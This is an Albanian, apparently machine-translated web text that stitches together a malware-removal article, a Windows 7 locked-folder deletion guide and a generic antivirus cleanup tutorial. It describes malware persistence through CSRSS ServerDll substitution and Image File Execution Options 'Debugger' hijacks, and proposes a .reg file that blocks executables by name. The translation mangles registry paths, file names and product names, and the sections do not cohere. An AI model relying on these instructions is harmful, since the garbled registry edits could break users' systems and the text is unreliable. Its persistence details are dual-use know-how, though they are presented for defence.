& nbsp & nbsp Ndonjëherë, si rezultat i veprimeve të pasakta të një virusi (ose antivirus), sistemi në përgjithësi ndalon ngarkimin. Më lejoni t'ju jap një shembull tipik. Programet me qëllim të keq përpiqen të depërtojnë në sistem duke përdorur metoda të ndryshme, duke përfshirë mjaft të pazakonta. Gjatë procesit fillestar të nisjes, edhe para se të regjistrohet përdoruesi, hapet Menaxheri i Sesionit (\ SystemRoot \ System32 \ smss.exe), detyra e të cilit është të fillojë nënsistemet dhe shërbimet (shërbimet) e nivelit të lartë të sistemit operativ. Në këtë fazë, nisen proceset CSRSS (Procesi i funksionimit të serverit të klientit), WINLOGON (Logon në Windows), LSASS (LSA shell) dhe shërbimet e mbetura me parametrin Start = 2 nga çelësi i regjistrit.
HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Shërbimet
& nbsp & nbsp Informacioni specifik për Session Manager është në çelësin e regjistrit
HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Control \ Session Manager
Një nga mënyrat për ta futur atë në sistem është zëvendësimi i skedarit dll për CSRSS. Nëse shikoni përmbajtjen e postimit
HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Control \ Session Manager \ SubSystems
Do të gjeni kuptimet
ServerDll = basesrv, ServerDll = winsrv... Bibliotekat basesrv.dll dhe winsrv.dll janë skedarët e sistemit "korrekt" të ngarkuar nga shërbimi CSRSS në një sistem normal (të painfektuar). Kjo hyrje në regjistër mund të korrigjohet në një hyrje që ofron ngarkim, për shembull, në vend të basesrv.dll, bazëpvllk32.dll me qëllim të keq:
ServerDll = basepvllk32 (ose ndonjë dll tjetër përveç basesrv dhe winsrv)
Kjo do të sigurojë, në rindezjen tjetër, që malware të jetë nën kontroll. Nëse antivirusi juaj zbulon dhe heq bazën e integruar të bazëspvllk32, duke e lënë hyrjen e regjistrit të paprekur, atëherë nisja e sistemit do të përfundojë me një "ekran blu të vdekjes" (BSOD) me gabimin STOP c000135 dhe një mesazh për pamundësinë për të ngarkuar basepvllk32.
Ju mund ta korrigjoni situatën si kjo:
Do të niset në tastierën e rikuperimit (ose në ndonjë sistem tjetër) dhe do të kopjojë skedarin basesrv.dll nga dosja C: \ WINDOWS \ system32 në të njëjtën dosje nën emrin basepvllk32.dll. Pas kësaj, sistemi do të nisë dhe ju mund të korrigjoni manualisht hyrjen në regjistër.
- nisni duke përdorur Winternals ERD Commander dhe rregulloni hyrjen në regjistër ServerDll = basesrv... Ose kthejeni sistemin duke përdorur një pikë rivendosjeje.
& nbsp & nbsp Një shembull tjetër tipik. Malware regjistrohet si një korrigjues për procesin explorer.exe duke krijuar një hyrje në regjistër si:
"Debugger" = "C: \ Program Files \ Microsoft Common \ wuauclt.exe"
Heqja e wuauclt.exe nga antivirus pa fshirë hyrjen e regjistrit e bën explorer.exe të paaftë të fillojë. Si rezultat, përfundoni me një desktop bosh, pa asnjë buton apo shkurtore. Mund të dilni nga situata duke përdorur kombinimin e tastit CTRL-ALT-DEL. Zgjidhni "Task Manager" - "New Task" - "Browse" - gjeni dhe ekzekutoni redaktorin e regjistrit regedit.exe. Pastaj hiqni çelësin
HKM \ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ Opsionet e ekzekutimit të skedarit të imazhit \ explorer.exe
dhe rindizni.
& nbsp & nbsp Në rastin kur e dini saktësisht se kur është infektuar sistemi, kthimi në një pikë restaurimi përpara kësaj ngjarjeje është një mënyrë mjaft e besueshme për të hequr qafe infeksionin. Ndonjëherë ka kuptim të kryhet jo një rikthim i plotë, por një i pjesshëm, me rivendosjen e skedarit të regjistrit SYSTEM, siç përshkruhet në artikullin "Problemet me ngarkimin e OS" të seksionit "Windows".
& nbsp & nbsp == maj 2008. ==
Shtimi
& nbsp & nbsp Kjo shtesë erdhi rreth një vit pasi u shkrua artikulli kryesor. Këtu vendosa të postoj zgjidhjet më interesante që janë shfaqur në procesin e luftimit të programeve me qëllim të keq. Diçka si shënime të shkurtra.
Pas heqjes së virusit, asnjë antivirus nuk funksionon.
& nbsp & nbsp Rasti është interesant në atë që metoda e bllokimit të softuerit antivirus mund të përdoret në luftën kundër skedarëve të ekzekutueshëm të viruseve. E gjitha filloi me faktin se pas heqjes së një virusi mjaft primitiv, Antivirusi i licencuar Stream nuk funksionoi. Riinstalimet me pastrimin e regjistrit nuk ndihmuan. Një përpjekje për të instaluar Avira Antivir Personal Free përfundoi me sukses, por vetë antivirusi nuk filloi. Gjatë nisjes së shërbimit "Avira Antivir Guard" kishte një mesazh afati në syslog. Rinisja manualisht përfundoi me të njëjtin gabim. Për më tepër, nuk u kryen asnjë proces të panevojshëm në sistem. Kishte njëqind për qind siguri - nuk kishte viruse, rootkits dhe gjëra të tjera të këqija (Malware) në sistem.
& nbsp & nbsp Në një moment u përpoqa të ekzekutoja programin antivirus AVZ. Parimi i funksionimit të AVZ bazohet kryesisht në kërkimin e anomalive të ndryshme në sistemin në studim. Nga njëra anë, ndihmon në kërkimin e Malware, por nga ana tjetër, dyshimet për përbërësit e antivirusit, antispyware dhe programeve të tjera legjitime që ndërveprojnë në mënyrë aktive me sistemin janë mjaft të natyrshme. Për të shtypur përgjigjen e AVZ ndaj objekteve të ligjshme dhe për të thjeshtuar analizën e rezultateve të skanimit të sistemit duke shënuar objektet legjitime me ngjyra dhe duke i filtruar ato nga regjistrat, përdoret baza e të dhënave e skedarëve të sigurt AVZ. Kohët e fundit, është lançuar një shërbim plotësisht automatik, i cili i lejon të gjithë të dërgojnë skedarë për të rimbushur këtë bazë të dhënash.
Por: skedari i ekzekutueshëm avz.exe nuk filloi! Riemërto avz.exe në musor.exe - gjithçka fillon mirë. Edhe një herë, AVZ u tregua një asistent i pazëvendësueshëm në zgjidhjen e problemit. Gjatë kryerjes së kontrolleve, rreshtat e mëposhtëm u shfaqën në rezultate:
E rrezikshme - korrigjuesi i procesit "avz.exe" = "ntsd-d"
E rrezikshme - përpunoni korrigjuesin "avguard.exe" = "ntsd-d"
:.
Ky ishte tashmë një drejtim serioz. Kërkimi në regjistër për kontekstin "avz" rezultoi në një degë
HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ Opsionet e ekzekutimit të skedarit të imazhit
Seksioni i emërtuar avz.exe që përmban një parametër të vargut të emërtuar "Debuger" dhe vlera.
Dhe, siç doli më vonë, kjo degë përmbante jo vetëm seksionin "avz.exe", por edhe seksione me emrat e moduleve të ekzekutueshme të pothuajse të gjithë antivirusëve të njohur dhe disa shërbimeve të monitorimit të sistemit. Vetë Ntsd.exe është një korrigjues plotësisht i ligjshëm i Windows, i cili është standard në të gjitha versionet e OS, por një hyrje e tillë në regjistër e bën të pamundur fillimin e aplikacionit, emri i skedarit të ekzekutueshëm të të cilit përkon me emrin e ?? Seksioni exe.
& nbsp & nbsp Pas fshirjes së të gjithë çelësave të emërtuar ???.exe dhe që përmbajnë hyrjen "Debugger" = "ntsd -d" nga regjistri, sistemi u rikuperua plotësisht.
Si rezultat i analizimit të situatës me përdorimin e parametrit "ntsd -d" për të bllokuar nisjen e skedarëve të ekzekutueshëm, lindi ideja për të përdorur të njëjtën teknikë për të luftuar vetë viruset. Sigurisht, kjo nuk është një ilaç, por në një farë mase mund të zvogëlojë kërcënimin e infektimit të kompjuterit tuaj me viruse me emra të njohur të skedarëve të ekzekutueshëm. Për të pamundësuar ekzekutimin e skedarëve me emrat ntos.exe, file.exe, system32.exe, etj. në sistem. mund të krijoni një skedar reg për të importuar në regjistër:
Redaktori i Regjistrit të Windows Versioni 5.00
"Debugger" = "ntsd -d"
"Debugger" = "ntsd -d"
"Debugger" = "ntsd -d"
:.. etj.
Ju lutemi vini re se emri i seksionit nuk përmban shtegun e skedarit, kështu që kjo metodë nuk mund të përdoret për skedarët e viruseve, emrat e të cilëve përkojnë me emrat e skedarëve të ekzekutueshëm ligjorë, por vetë skedarët nuk janë të vendosur standardisht në sistemin e skedarëve. Për shembull, eksploruesi Explorer.exe ndodhet në dosjen \ WINDOWS \ dhe virusi ndodhet diku tjetër - në rrënjën e diskut, në dosjen \ temp, \ windows \ system32 \. Nëse krijoni një ndarje me emrin "Explorer.exe", më pas pasi të regjistroheni, do të merrni një desktop bosh pasi eksploruesi nuk do të fillojë. Edhe më keq, nëse krijoni një ndarje që ka të njëjtin emër si shërbimi i sistemit (winlogon.exe, csrss.exe, smss.exe, services.exe, lsass.exe), do të merrni një sistem të prishur. Nëse virusi ndodhet në C: \ temp \ winlogon.exe dhe moduli ligjor i hyrjes është C: \ WINDOWS \ SYSTEM32 \ winlogon.exe, krijimi i një ndarje të quajtur winlogon.exe do të rezultojë në pamundësinë për të nisur shërbimin winlogon dhe rrëzoni sistemin me një ekran blu të vdekjes (BSOD).
& nbsp & nbsp Por, megjithatë, nuk ia vlen të shpresojmë se kodi i kërkuar nga virusi do të përshtatet në secilin rast specifik. Pasi nuk duhet të shpresoni për një vetëshkatërrim të sinqertë të virusit, dhe aq më tepër, nuk duhet të dërgoni SMS. Çdo virus mund të hiqet, edhe nëse nuk zbulohet nga programi antivirus. Metodat e heqjes së ransomware nuk ndryshojnë nga metodat e heqjes së çdo softueri tjetër me qëllim të keq, me një, ndoshta, ndryshim - nuk duhet të humbni kohë duke u përpjekur të merreni me mbeturinat në mjedisin e një sistemi të infektuar, përveçse të zhvilloni aftësitë tuaja dhe të rimbushni njohurive.
Mënyra më e thjeshtë dhe më efektive është të nisni duke përdorur një sistem të ndryshëm, të pa infektuar dhe, pasi të jeni lidhur me atë të infektuar, të fshini skedarët e virusit dhe të rregulloni shënimet në regjistër. Unë kam shkruar tashmë për këtë më lart, në pjesën kryesore të artikullit, dhe këtu do të përpiqem të përshkruaj thjesht disa opsione të shkurtra për heqjen e virusit.
Përdorimi i Dr.Web LiveCD është metoda më e thjeshtë që nuk kërkon ndonjë njohuri të veçantë. Shkarkoni imazhin e iso CD-së, digjni atë në disk, nisni nga CD-ROM dhe ekzekutoni skanerin. Duke përdorur Winternals ERD Commander. Nisni prej tij, lidheni me sistemin e infektuar dhe ktheheni në një pikë kontrolli rikuperimi me një datë kur nuk kishte ende asnjë infeksion. Zgjidhni menunë Veglat e Sistemit - Rivendosja e Sistemit... Nëse nuk mund të riktheheni duke përdorur ERD Commander, përpiquni të gjeni manualisht skedarët e regjistrit në të dhënat e pikës së kontrollit dhe t'i rivendosni ato në drejtorinë e Windows. Unë e përshkrova në detaje në artikullin "Puna me regjistrin". Nisja në një OS tjetër dhe heqja manuale e virusit. Mënyra më e vështirë, por më efektive. Është më i përshtatshëm për të përdorur të njëjtin komandant ERD si një OS tjetër. Metoda për zbulimin dhe heqjen e një virusi mund të jetë si më poshtë:
Shkoni te disku i sistemit të infektuar dhe skanoni katalogët e sistemit për skedarë të ekzekutueshëm dhe skedarë drejtues me një datë krijimi afër datës së infektimit. Zhvendosni këta skedarë në një dosje të veçantë. Kushtojini vëmendje drejtorive
\ Windows
\ Windows \ system32
\ Windows \ system32 \ drejtuesit
\ Windows \ Detyrat \
\ RECIKLUES
\ Informacioni i vëllimit të sistemit
Drejtoritë e përdoruesve \ Dokumentet dhe cilësimet \ Të gjithë përdoruesit dhe \ Documents And Settings \ emri i përdoruesit
Është shumë i përshtatshëm për të përdorur FAR Manager për të kërkuar skedarë të tillë, me renditjen sipas datës të aktivizuar për panelin ku shfaqet përmbajtja e drejtorisë (kombinimi CTRL-F5). Kushtojini vëmendje të veçantë skedarëve të fshehur të ekzekutueshëm. Ekziston gjithashtu një mjet efektiv dhe i thjeshtë nga Nirsoft - SearchMyFiles, përdorimi i të cilit lejon, në shumicën dërrmuese të rasteve, të zbuloni lehtësisht skedarë me qëllim të keq edhe pa përdorur një antivirus. Metoda për zbulimin e skedarëve me qëllim të keq sipas kohës së krijimit (koha e krijimit)
Lidhu me regjistrin e sistemit të infektuar dhe kërko lidhje me emrat e këtyre skedarëve. Vetë regjistri nuk ndërhyn në kopjimin paraprak (plotësisht ose të paktën ato pjesë ku gjenden lidhjet e mësipërme). Mund t'i fshini lidhjet ose t'i ndryshoni emrat e skedarëve në to në të tjerë, për shembull - file.exe në file.ex_, server.dll në server.dl_, driver.sys në driver.sy_.
Kjo metodë nuk kërkon njohuri të veçanta dhe në rastet kur virusi nuk ndryshon datën e modifikimit të skedarëve të tij (që është ende shumë e rrallë), ajo ka një efekt pozitiv. Edhe nëse virusi nuk zbulohet nga programi antivirus.
Nëse metodat e mëparshme dështuan, një gjë mbetet - një kërkim manual për variantet e mundshme të lëshimit të virusit. Në meny Mjete administrative Komandanti ERD "dhe ka artikuj:
Autoruns- informacion në lidhje me parametrat e nisjes së aplikacionit dhe guaskën e përdoruesit.
Menaxher i Shërbimit dhe Shoferit- informacion rreth shërbimeve dhe drejtuesve të sistemit.
Një situatë është e mundur kur duhet të fshini një dosje, dhe Vidnovs 7 e ndalon këtë veprim. Gabimet shfaqen me tekstin "Dosja është tashmë në përdorim". Edhe nëse jeni absolutisht i sigurt se objekti nuk ka vlerë dhe duhet hequr urgjentisht, sistemi nuk e lejon këtë veprim.
Me shumë mundësi, ky mosfunksionim është shkaktuar nga fakti se dosja e fshirë është e zënë nga një aplikacion i palës së tretë. Por edhe pasi të jenë mbyllur të gjitha aplikacionet që mund të përdoren në të, dosja mund të mos fshihet. Për shembull, një depo elektronike e të dhënave mund të bllokohet për shkak të operacioneve të gabuara të përdoruesit. Këta elementë bëhen "peshë e vdekur" në hard disk dhe pushtojnë pa dobi memorien.
Metoda 1: Komandant total
Menaxheri më i popullarizuar dhe më funksional i skedarëve është Total Commander.
Metoda 2: Menaxher FAR
Një tjetër menaxher skedari që mund të ndihmojë në fshirjen e objekteve jo të lëvizshme.
Metoda 3: Zhbllokues
Unlocker është absolutisht falas dhe ju lejon të hiqni dosjet dhe skedarët e mbrojtur ose të kyçur në Windows 7.
Metoda 4: FileASSASIN
Programi FileASSASIN është i aftë të heqë çdo skedar dhe dosje të kyçur. Parimi i funksionimit është shumë i ngjashëm me Unlocker.
Ka një sërë programesh të ngjashme që mund t'i gjeni në lidhjen më poshtë.
Metoda 5: Cilësimet e dosjeve
Kjo metodë nuk kërkon shërbime të palëve të treta dhe është shumë e lehtë për t'u zbatuar.
Metoda 6: Task Manager
Ndoshta gabimi ndodh për shkak të një procesi që funksionon brenda dosjes.
Metoda 7: Windows 7 Safe Mode
Ne hyjmë në sistemin operativ Windows 7 në mënyrë të sigurt.
Tani gjejmë dosjen e nevojshme dhe përpiqemi të fshijmë OS në këtë mënyrë.
Në disa raste, një rindezje e thjeshtë e sistemit mund të ndihmojë. Rinisni Windows 7 përmes menysë "Fillimi".
Infektimi i një kompjuteri me viruse nuk është një temë e re për çdo përdorues të kompjuterit. Kur ngarkoni sistemin operativ, shfaqen dritare të ndryshme informacioni, disa programe nuk funksionojnë siç duhet, faqja e fillimit të shfletuesit ndryshon dhe instalohen shtesa të ndryshme. Ndodh gjithashtu që kompjuteri të mos ndizet fare ose të ndizet për një kohë shumë të gjatë, pastaj ngadalësohet gjatë funksionimit.
Nëse keni të paktën një nga shenjat e mësipërme, atëherë patjetër që keni marrë një virus. Prandaj, le të kuptojmë se në çfarë mënyrash mund ta hiqni vetë virusin nga kompjuteri juaj.
Përdorimi i softuerit antivirus
Gjëja e parë që duhet të bëni është të skanoni kompjuterin tuaj duke përdorur programin e instaluar antivirus. Unë kam të instaluar Avast, kështu që po shfaq në të. Gjeni ikonën përkatëse në tabaka dhe klikoni mbi të me miun.
Dritarja kryesore e programit do të hapet. Tani sigurohuni që të keni të instaluar përkufizimin më të fundit të virusit: në "Cilësimet" shkoni te skeda "Përditëso". Shikoni kur është marrë përditësimi i fundit, nëse është e nevojshme, klikoni në butonin "Përditëso".
Nga lista rënëse zgjidhni Skanim i plotë dhe klikoni "Fillimi". Nëse keni të instaluar një program tjetër antivirus, gjeni të njëjtin artikull në të dhe aktivizoni një skanim të plotë të kompjuterit tuaj.
Kështu, ne do të kryejmë një skanim të plotë të kompjuterit tuaj për viruse. Ky proces do të marrë shumë kohë - 11 orë, megjithatë, gjithçka varet nga sa informacion ruhet në kompjuter - sa më i madh të jetë vëllimi i tij, aq më shumë duhet të kontrollohet.
Kur procesi të ketë përfunduar plotësisht, përpiquni të kuroni kërcënimet e gjetura. Nëse kjo nuk mund të bëhet, atëherë është më mirë t'i fshini ato.
Do të ishte më mirë nëse skanojmë kompjuterin për viruse me një program tjetër antivirus: për shembull, Dr.Web CureIt ose AVP Tool. Për t'u përdorur për shtëpi, por jo për qëllime komerciale, këto programe janë plotësisht falas. Përveç kësaj, ata nuk kërkojnë instalim në një kompjuter - nuk do të ketë asnjë konflikt me antivirusin e instaluar.
Ju mund ta shkarkoni Dr.Web CureIt nga faqja zyrtare e internetit duke ndjekur lidhjen:
https://free.drweb.ru/download+cureit+free/
AVP Tool është një mjet nga laboratori Kaspersky që shëron kompjuterin e një përdoruesi tashmë të infektuar. Shkarkoni atë nga faqja zyrtare në lidhjen:
http://www.kaspersky.com/antivirus-removal-tool
Është më mirë të shkarkoni programe nga faqja zyrtare e internetit në mënyrë që përditësimet më të fundit të bazës së të dhënave të viruseve të instalohen në të.
Për të skanuar kompjuterin tuaj duke përdorur një nga shërbimet që keni zgjedhur, shkoni në modalitetin e sigurt: kur ngarkoni sistemin operativ, shtypni butonin F8. Tani ekzekutoni programin dhe bëni një skanim të plotë.
Në fund të procesit, përpiquni të dezinfektoni ose hiqni kërcënimet e gjetura. Ju lutemi vini re se pas fshirjes së skedarëve të caktuar, disa programe pirate mund të mos funksionojnë.
Trajtimi i një kompjuteri nga viruset duke përdorur programe antivirus nuk na jep një garanci 100% që ai tani është i pastër. Kjo kërkon disa hapa të tjerë.
Heqja e programeve të pakuptueshme nga fillimi
Në këtë pikë, keni nevojë, ose ato që i përdorni jashtëzakonisht rrallë. Shtypni kombinimin Win + R dhe në rreshtin Run shkruani komandën msconfig dhe klikoni OK.
Do të hapet një dritare. Këtu, kutitë e kontrollit shënojnë programet që funksionojnë së bashku me sistemin operativ. Çaktivizoni nisjen e të gjitha programeve që nuk ju nevojiten: zgjidhni kutitë përballë tyre. Kërkoni programe të pakuptueshme në listë, me vendndodhje ose prodhues të paqartë.
Kur të keni mbaruar, klikoni Apliko dhe OK.
Nëse jeni në dyshim nëse duhet të çaktivizoni një artikull të caktuar nga lista, rri pezull mbi të me miun në seksionin "Command" dhe shikoni vendndodhjen e skedarit. Më pas gjeni atë përmes eksploruesit tuaj dhe shënoni datën kur është shkarkuar. Nëse ishte në ditët kur kompjuteri ishte i infektuar, atëherë mund të zgjidhni me siguri kutinë.
Video të ngjashme:
Kontrollimi i programeve të instaluara së fundi
Për ta bërë këtë, shkoni te "Start" - "Paneli i kontrollit" – "Programet dhe veçoritë".
Në dritaren tjetër, klikoni në kolonën "Instaluar" dhe shikoni programet më të fundit të instaluara. Nëse midis tyre ka nga ato që nuk i keni instaluar (emri dhe përmbajtja e pakuptueshme, e panjohur) - klikoni mbi të me miun dhe klikoni "Fshi".
Për t'u siguruar që shërbimet nuk lënë asnjë gjurmë pas, përdorni në një PC. Kjo mund të bëhet me dorë, ose duke përdorur shërbime të veçanta.
Video të ngjashme:
Kontrollimi i proceseve në menaxherin e detyrave
Ngarkesa në procesorin qendror mund të ngadalësojë ndjeshëm performancën e kompjuterit tuaj. Nëse më parë nuk kishte probleme dhe ngrirje, por tani po përballeni me këtë, atëherë ndoshta ky është rezultat i një programi me qëllim të keq.
Klikoni në butonin "Start" dhe futni në shiritin e kërkimit "Menaxher detyrë", më pas shtypni Enter.
Këtu shkoni te skeda "Proceset" dhe sigurohuni që nuk ka vlera shumë të mëdha në kolonën "CPU". Nëse vëreni ndonjë gjë të dyshimtë, klikoni me të djathtën në këtë rresht dhe zgjidhni nga menyja e kontekstit "Hap vendndodhjen e ruajtjes së skedarëve".
File Explorer do të hapë vendndodhjen e skedarit. Shiko tek "Data e ndryshimit" dosje. Nëse përputhet me numrin kur supozohet se keni kapur virusin, atëherë fshijeni këtë skedar dhe kthehuni te "Menaxher detyrë", zgjidhni linjën e kërkuar me miun dhe shtypni "Përfundimi i procesit".
Heqja e skedarëve të përkohshëm
Në këtë pikë jemi vendi ku ruhen të gjithë skedarët e përkohshëm. Së pari ju duhet të aktivizoni dukshmërinë e skedarëve dhe dosjeve. Ne shkojmë "Fillimi" - "Paneli i kontrollit" – "Cilësimet e dosjeve".
Në dritaren tjetër, shkoni te skeda "Shiko" dhe vendosni një shënues përpara artikullit Shfaq skedarët, dosjet dhe disqet e fshehura... Klikoni "Aplikoni" dhe "OK".
Ne jemi duke kërkuar për një dosje tjetër "Temp" në kompjuter:
C: - Përdoruesit - Emri JUAJ Llogaria- AppData - Local - Temp
Fshini të gjithë skedarët prej tij gjithashtu.
Video të ngjashme:
Kontrollimi i skedarit të hosteve
Ndonjëherë viruset mund të hyjnë në skedarin e hosteve. Shkoni në rrugën e mëposhtme:
C: - Windows - System32 - drejtuesit - etj
Klikoni mbi skedarin me emrin "hosts" me butonin e djathtë të miut, zgjidhni "Open" dhe hapeni atë me notepad.
Për sistemin operativ Windows 7, teksti duhet të shkruhet në skedar, si në figurën më poshtë.
Për të reduktuar pyetjet në cache DNS dhe serverët DNS, faqet e Internetit të ngarkuara shpesh mund të shkruhen gjithashtu në skedarin host. Nëse vëreni informacione të dyshimta atje, fshijeni atë.
Nëse keni shkuar në dosjen e dëshiruar dhe nuk keni gjetur skedarin e hosteve atje, atëherë mund të jetë për shkak të një virusi. Aktivizoni dukshmërinë e skedarëve dhe dosjeve të fshehura siç përshkruhet më sipër. Pastaj hapni skedarin hosts që shfaqet dhe shikoni që teksti që duhet të jetë si parazgjedhje është i shkruar atje.
Nëse është ndryshuar, shkruani gjithçka ashtu siç duhet. Në rast se skedari nuk mund të redaktohet, krijoni një të ri me shtesën .txt dhe emrin host dhe shkruani të gjithë tekstin, si në foton e mësipërme - për sistemin operativ Windows 7. Për sistemet e tjera operative, teksti është ndryshe, prandaj shikoni në internet.
Ne pastrojmë regjistrin
Kjo duhet bërë nëse e keni çinstaluar programin e dyshimtë nëpërmjet "Programet dhe veçoritë", ose kanë përfunduar një skedar të pakuptueshëm në procese.
Për të hapur Redaktorin e Regjistrit, shtypni kombinimin Win + R. Më pas, në dritaren Run, shkruani komandën regedit dhe klikoni OK.
Tani, në skedën "Redakto", zgjidhni "Gjeni" ose shtypni kombinimin Ctrl + F. Në shiritin e kërkimit, futni emrin e programit ose një pjesë të emrit që keni fshirë më pas "Programet dhe veçoritë" ose "Instalimi dhe heqja e programeve"... Në shiritin e kërkimit, mund të vendosni edhe emrin e skedarit, punën e të cilit e keni përfunduar në procese.
Nëse një degë e regjistrit ose një parametër gjendet me emrin e tij, do të duhet të fshihet - zgjidhni parametrin ose çelësin e regjistrit me miun dhe shtypni Fshi.
Pastrimi i cache-it të shfletuesit dhe heqja e shtesave
Nëse virusi është i lidhur me një shfletues, atëherë së pari kontrolloni se ku çojnë shkurtoret e krijuara në desktop. Për ta bërë këtë, klikoni me të djathtën në shkurtoren e shfletuesit dhe shkoni te "Properties".
Këtu, në fushën "Object", kontrolloni që lidhja të çon në diskun dhe dosjen ku është instaluar shfletuesi. Nëse lidhja çon në një skedar të dyshimtë, fshini shkurtoren dhe rikrijoni atë.
Për të pastruar cache-in e shfletuesit tuaj, përdorni një program të veçantë si CCleaner. Shkarkoni, instaloni dhe ekzekutoni në kompjuterin tuaj. Pastaj, në seksionin "Pastrimi" në skedën "Aplikimet", zgjidhni artikujt e nevojshëm me shenja, klikoni "Analiza", pastaj "Pastrimi".
Tani shkoni te skeda "Zgjerime", nëse do të instalohen shtesa që kanë emra të pakuptueshëm, ose nuk i keni instaluar vetë - klikoni "Hiq".
Krijimi live CD
Kjo është e dobishme nëse kompjuteri juaj është i bllokuar nga një virus: ai ndizet, por sistemi operativ nuk ngarkohet. Si të digjni një CD Live në një USB flash drive ose disk dhe të pastroni kompjuterin tuaj, lexoni artikullin duke klikuar në lidhje.
Për ta bërë këtë, do t'ju duhet një kompjuter tjetër nga i cili mund të shkarkoni imazhin, një disk bosh ose një flash drive. Ju gjithashtu do të duhet të ndryshoni përparësinë e nisjes në BIOS. Ju gjithashtu mund të lexoni një artikull në lidhje me këtë duke klikuar në lidhjen.
